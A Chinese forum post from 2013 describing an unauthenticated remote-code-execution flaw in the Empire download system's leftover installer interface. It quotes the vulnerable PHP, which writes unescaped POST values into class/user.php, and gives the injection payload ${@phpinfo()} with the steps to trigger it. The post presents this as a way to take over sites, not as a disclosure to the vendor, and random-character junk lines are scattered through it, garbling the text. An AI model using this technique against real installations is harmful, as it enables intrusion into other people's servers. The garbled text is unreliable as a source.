这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
7 E% ]8 l( S1 ]3 g) g" b$ F$ l Z, E$ i' O; ]6 U9 q9 n7 T/ v
- i( T/ y5 E0 x8 ~$ i7 x这是帝国的一套下载系统 如图# P! ?, N+ C* d" e0 V) k6 G& Q
ps(不需要任何账户和密码,直接写shell)
( J& m! e$ m! X4 V( I6 a; q3 B
由于很多站是由于下载要整合discuz 等等一些论坛....: l. {+ [) P# b/ T! N; [6 ]
% t9 D- L' l6 r8 d0 c
而帝国他又有一个万能接口,如图 # i5 @4 I7 ?# O3 v( W" ~5 U% W
6 C) C2 K/ \/ d) X) Q2 F- y: j1 K* x1 l
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
2 l6 T' a1 j8 s- ]2 ]$ m
$ i0 [( r; C: f! v9 u: J' \& ~% K( ?当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪4 L L# }1 G( L' X5 ? ]& z
5 o2 J9 Q" C, h' `% B在data/fun.php中的15行
& g9 ^2 m. L0 k' r: t& ?! T* q. c6 p: M+ [* O" O
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {' Q. Y$ d! m- s' Y( J
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
- W5 z5 Q: {/ ?* R6 H& s: S4 `- F4 K# X) O- H. ?. p
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);# v& y6 H' O$ W! \
7 o! R3 Y$ E9 Y0 O N' q+ X( W7 H- y
他将传进来的变量进行了切割,然后赋给了$filetext. H' _7 R# F! ~0 X8 D6 f' x
3 O1 \. T: `$ I3 z3 g
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
, k6 [* ^4 L) O0 _$ V0 H7 K, Q/ k! u; Z9 O' U/ B. F! E
我们看看写入的结果,随便填一个
0 i7 M7 e8 J! j6 e) P/ F; I4 O% T) e! v4 K/ \
2 X6 L; z6 v4 W+ c; w- N- V
1 a1 [% ~1 t. G }8 W3 P7 I3 g6 @- b# {# m! u3 Y/ I
3 y( l. Q6 p" |: R2 V* u1 I5 k1 s$ T) f+ Q5 r& C5 J" @
T; y0 n- x5 ], k: T
8 ]) J# ^8 S0 w( B1 s. _
6 H, Y/ X1 H9 U/ \ f1 q5 g- }: ?7 s |5 v2 m( i
; H( x% h. O: Y( v. k7 G, M
1 d8 b# {$ d* O2 K! h8 _0 w% u1 E& M! x/ t. o) h" q4 d
3 A- j/ ~: D* M# M
% |- u3 p3 e3 G, c# B' B/ }
p, H% v; p- g8 b. q9 X7 m$ m+ g3 e. M+ z
6 r9 @9 d! G) l( G, O7 E' u; P; ]. x0 Q, V# }- H
2 V. ]8 M, r, x2 u4 J# w8 d9 d* y
所以我们淫荡点,写个${@phpinfo()}试试 " X: t( L$ w; v2 w( Z, Z G7 g8 ~
然后访问以下class/user.php这个文件. {! i+ i8 F8 a
日了吧
3 A. U, w+ N5 U1 M) {' ]6 O
! G) V4 d8 e/ J% Z; \3 F) a# r. q
! x; L7 ?, W* E3 L2 R$ Z) L7 `* T- D1 ]! W }8 J/ b
9 ^8 Z) n. q \ c/ z; j: I" j( c
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对